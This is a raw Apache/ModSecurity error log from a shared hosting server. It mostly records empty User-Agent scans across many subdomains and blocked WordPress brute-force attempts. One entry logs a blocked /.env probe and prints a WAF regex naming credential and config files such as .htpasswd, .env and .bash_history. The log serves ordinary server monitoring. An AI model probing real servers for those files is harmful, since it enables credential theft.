[Tue May 26 13:03:32.509987 2026] [security2:error] [pid 470766:tid 470926] [client 46.151.182.172:60927] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "enattafoodparcel.org.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ726wAAAB4"]
[Tue May 26 13:03:32.510381 2026] [security2:error] [pid 470766:tid 470909] [client 46.151.182.172:60918] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "buyrepublic.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ723gAAAA0"]
[Tue May 26 13:03:32.518776 2026] [security2:error] [pid 470766:tid 471014] [client 46.151.182.172:60924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "401"] [hostname "webdisk.thedebateafrica.org"] [uri "/___proxy_subdomain_webdisk/"] [unique_id "ahVMzOjO_W1DqEcFHQ728QAAAHY"]
[Tue May 26 13:03:32.531662 2026] [proxy:error] [pid 470766:tid 470977] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:03:32.531721 2026] [proxy_http:error] [pid 470766:tid 470977] [client 46.151.182.172:60934] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:03:32.532581 2026] [proxy:error] [pid 470766:tid 470977] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:03:32.532656 2026] [proxy_http:error] [pid 470766:tid 470977] [client 46.151.182.172:60934] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:03:32.532777 2026] [security2:error] [pid 470766:tid 470977] [client 46.151.182.172:60934] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/cgi-sys/503.html"] [unique_id "ahVMzOjO_W1DqEcFHQ72-QAAAFE"]
[Tue May 26 13:03:32.556051 2026] [security2:error] [pid 470766:tid 470789] [remote 173.249.21.166:44652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVMzOjO_W1DqEcFHQ720gAAGxY"]
[Tue May 26 13:03:32.566860 2026] [security2:error] [pid 470766:tid 471002] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "osanctus.org.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73DwAAAGo"]
[Tue May 26 13:03:32.567980 2026] [security2:error] [pid 470766:tid 470899] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "herbalplus.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73EwAAAAM"]
[Tue May 26 13:03:32.571957 2026] [security2:error] [pid 470766:tid 470970] [client 46.151.182.172:60935] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "agsnails.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ72-wAAAEo"]
[Tue May 26 13:03:32.572212 2026] [security2:error] [pid 470766:tid 470902] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "landmark.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73DgAAAAY"]
[Tue May 26 13:03:32.572233 2026] [security2:error] [pid 470766:tid 471012] [client 46.151.182.172:60933] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "herbalplus.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73AAAAAHQ"]
[Tue May 26 13:03:32.574720 2026] [security2:error] [pid 470766:tid 471020] [client 46.151.182.172:60926] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "osanctus.org.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ727wAAAHw"]
[Tue May 26 13:03:32.575639 2026] [autoindex:error] [pid 470766:tid 470990] [client 46.151.182.172:0] AH01276: Cannot serve directory /home2/debatqhn/finclass.africa/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:32.576309 2026] [security2:error] [pid 470766:tid 470990] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "finclass.africa.thedebateafrica.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73EAAAAF4"]
[Tue May 26 13:03:32.576499 2026] [security2:error] [pid 470766:tid 470938] [client 46.151.182.172:60923] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "landmark.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ727QAAACo"]
[Tue May 26 13:03:32.577640 2026] [security2:error] [pid 470766:tid 470966] [client 46.151.182.172:60949] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.thedebateafrica.org"] [uri "/___proxy_subdomain_webmail/"] [unique_id "ahVMzOjO_W1DqEcFHQ73FgAAAEY"]
[Tue May 26 13:03:32.581883 2026] [autoindex:error] [pid 470766:tid 471021] [client 46.151.182.172:0] AH01276: Cannot serve directory /home2/debatqhn/couplesspot.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:32.582576 2026] [security2:error] [pid 470766:tid 471021] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "couplesspot.thedebateafrica.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73EgAAAH0"]
[Tue May 26 13:03:32.587575 2026] [autoindex:error] [pid 470766:tid 470974] [client 46.151.182.172:0] AH01276: Cannot serve directory /home2/debatqhn/crusties.agsnails.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:32.588197 2026] [security2:error] [pid 470766:tid 470974] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "crusties.agsnails.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73HAAAAE4"]
[Tue May 26 13:03:32.588475 2026] [autoindex:error] [pid 470766:tid 470993] [client 46.151.182.172:0] AH01276: Cannot serve directory /home2/debatqhn/enattafoundation.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:32.589145 2026] [security2:error] [pid 470766:tid 470993] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "enattafoundation.org.thedebateafrica.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73IAAAAGE"]
[Tue May 26 13:03:32.591398 2026] [autoindex:error] [pid 470766:tid 470987] [client 46.151.182.172:0] AH01276: Cannot serve directory /home2/debatqhn/newtest.debatenigeria.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:32.592498 2026] [security2:error] [pid 470766:tid 470987] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "newtest.thedebateafrica.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73HgAAAFs"]
[Tue May 26 13:03:32.595025 2026] [autoindex:error] [pid 470766:tid 470985] [client 46.151.182.172:0] AH01276: Cannot serve directory /home2/debatqhn/crusties.debatenigeria.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:32.595677 2026] [security2:error] [pid 470766:tid 470985] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "crusties.thedebateafrica.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73HQAAAFk"]
[Tue May 26 13:03:32.598051 2026] [security2:error] [pid 470766:tid 470983] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "rethinkinclusion.org.thedebateafrica.org"] [uri "/wp-content/endurance-page-cache/_index.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73KAAAACE"]
[Tue May 26 13:03:32.598121 2026] [security2:error] [pid 470766:tid 471015] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "strapptech.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73LgAAAHc"]
[Tue May 26 13:03:32.623709 2026] [security2:error] [pid 470766:tid 470964] [client 46.151.182.172:60948] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "friendsalongtheway.net"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73FQAAAEQ"]
[Tue May 26 13:03:32.624901 2026] [security2:error] [pid 470766:tid 471002] [client 46.151.182.172:60953] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "strapptech.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73FAAAAGo"]
[Tue May 26 13:03:32.629268 2026] [security2:error] [pid 470766:tid 470971] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "adg-foods.com.thedebateafrica.org"] [uri "/wp-content/endurance-page-cache/_index.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73MAAAAH8"]
[Tue May 26 13:03:32.629543 2026] [security2:error] [pid 470766:tid 470908] [client 46.151.182.172:60942] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "newtest.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73BgAAAAw"]
[Tue May 26 13:03:32.629894 2026] [security2:error] [pid 470766:tid 470959] [client 46.151.182.172:60932] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "couplesspot.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ729wAAAD8"]
[Tue May 26 13:03:32.630139 2026] [security2:error] [pid 470766:tid 471018] [client 46.151.182.172:60938] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "crusties.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ72_gAAAHo"]
[Tue May 26 13:03:32.630285 2026] [security2:error] [pid 470766:tid 470940] [client 46.151.182.172:60930] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "finclass.africa.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ72-AAAACw"]
[Tue May 26 13:03:32.630553 2026] [core:alert] [pid 470766:tid 470914] [client 46.151.182.172:0] /home2/debatqhn/gbogbonise.com/.htaccess: </IfModule> without matching <IfModule> section
[Tue May 26 13:03:32.630942 2026] [security2:error] [pid 470766:tid 470986] [client 46.151.182.172:60944] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "crusties.agsnails.com"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73CgAAAFo"]
[Tue May 26 13:03:32.630953 2026] [security2:error] [pid 470766:tid 470903] [client 46.151.182.172:60957] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "adg-foods.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73KQAAAAc"]
[Tue May 26 13:03:32.631165 2026] [security2:error] [pid 470766:tid 470914] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "gbogbonise.com.thedebateafrica.org"] [uri "/cgi-sys/500.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73NAAAABI"]
[Tue May 26 13:03:32.631641 2026] [security2:error] [pid 470766:tid 470958] [client 46.151.182.172:60950] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "gbogbonise.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73FwAAAD4"]
[Tue May 26 13:03:32.633061 2026] [security2:error] [pid 470766:tid 470968] [client 46.151.182.172:60941] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "enattafoundation.org.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73CAAAAEg"]
[Tue May 26 13:03:32.634430 2026] [security2:error] [pid 470766:tid 470971] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "ellastylze.com.thedebateafrica.org"] [uri "/wp-content/endurance-page-cache/_index.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73MwAAAEc"]
[Tue May 26 13:03:32.635418 2026] [security2:error] [pid 470766:tid 470991] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-content/endurance-page-cache/_index.html"] [unique_id "ahVMzOjO_W1DqEcFHQ73NQAAAEs"]
[Tue May 26 13:03:32.637187 2026] [security2:error] [pid 470766:tid 470925] [client 46.151.182.172:60960] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73KgAAAB0"]
[Tue May 26 13:03:32.638022 2026] [security2:error] [pid 470766:tid 470952] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "medlivon.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73MQAAADg"]
[Tue May 26 13:03:32.638618 2026] [security2:error] [pid 470766:tid 470939] [client 46.151.182.172:60951] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "medlivon.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73GAAAACs"]
[Tue May 26 13:03:32.641221 2026] [security2:error] [pid 470766:tid 470984] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "ameritradeng.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73NgAAAFg"]
[Tue May 26 13:03:32.641821 2026] [security2:error] [pid 470766:tid 470947] [client 46.151.182.172:60952] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "ameritradeng.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73GgAAADM"]
[Tue May 26 13:03:32.657786 2026] [security2:error] [pid 470766:tid 470956] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "friendsalongtheway.net.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73OwAAADw"]
[Tue May 26 13:03:32.658215 2026] [security2:error] [pid 470766:tid 470947] [client 46.151.182.172:60974] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "friendsalongtheway.net.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73OAAAADM"]
[Tue May 26 13:03:32.697826 2026] [security2:error] [pid 470766:tid 470996] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "obinnawrites.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73LwAAAGQ"]
[Tue May 26 13:03:32.702425 2026] [security2:error] [pid 470766:tid 470898] [client 46.151.182.172:60956] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "obinnawrites.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73IQAAAAI"]
[Tue May 26 13:03:32.752873 2026] [security2:error] [pid 470766:tid 470979] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "lmialumni.org.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73EQAAAFM"]
[Tue May 26 13:03:32.753495 2026] [security2:error] [pid 470766:tid 470994] [client 46.151.182.172:60940] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "lmialumni.org.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73AQAAAGI"]
[Tue May 26 13:03:32.882736 2026] [security2:error] [pid 470766:tid 470941] [client 157.20.138.61:62399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73SgAAAC0"]
[Tue May 26 13:03:32.882907 2026] [security2:error] [pid 470766:tid 470941] [client 157.20.138.61:62399] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73SgAAAC0"]
[Tue May 26 13:03:32.891922 2026] [security2:error] [pid 470766:tid 470976] [client 46.151.182.172:60945] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "rethinkinclusion.org.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73DAAAAFA"]
[Tue May 26 13:03:32.906636 2026] [security2:error] [pid 470766:tid 470935] [client 46.151.182.172:60955] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "ellastylze.com.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ73GwAAACc"]
[Tue May 26 13:03:33.223808 2026] [core:crit] [pid 470766:tid 470952] (13)Permission denied: [client 40.77.167.2:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:03:33.424798 2026] [security2:error] [pid 470766:tid 470972] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "tedxnutm.org.ng.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ73IgAAAEw"]
[Tue May 26 13:03:33.427252 2026] [security2:error] [pid 470766:tid 471003] [client 46.151.182.172:61139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "obinnawrites.com"] [uri "/"] [unique_id "ahVMzejO_W1DqEcFHQ73YAAAAGs"]
[Tue May 26 13:03:33.427707 2026] [security2:error] [pid 470766:tid 470961] [client 46.151.182.172:60939] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "tedxnutm.org.ng.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ72_wAAAEE"]
[Tue May 26 13:03:33.673174 2026] [security2:error] [pid 470766:tid 470898] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "lmialumni.org"] [uri "/index.php"] [unique_id "ahVMzejO_W1DqEcFHQ73aAAAAAI"]
[Tue May 26 13:03:33.674837 2026] [security2:error] [pid 470766:tid 470956] [client 46.151.182.172:61151] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "lmialumni.org"] [uri "/"] [unique_id "ahVMzejO_W1DqEcFHQ73YgAAADw"]
[Tue May 26 13:03:34.213789 2026] [security2:error] [pid 470766:tid 470954] [client 45.45.237.225:38494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "athelstan.org.in"] [uri "/.env"] [unique_id "ahVMzujO_W1DqEcFHQ73jgAAADo"]
[Tue May 26 13:03:34.278788 2026] [security2:error] [pid 470766:tid 470943] [client 46.151.182.172:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVMzOjO_W1DqEcFHQ722QAAAC8"]
[Tue May 26 13:03:34.284779 2026] [security2:error] [pid 470766:tid 470989] [client 46.151.182.172:60912] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.thedebateafrica.org"] [uri "/"] [unique_id "ahVMzOjO_W1DqEcFHQ721gAAAF0"]
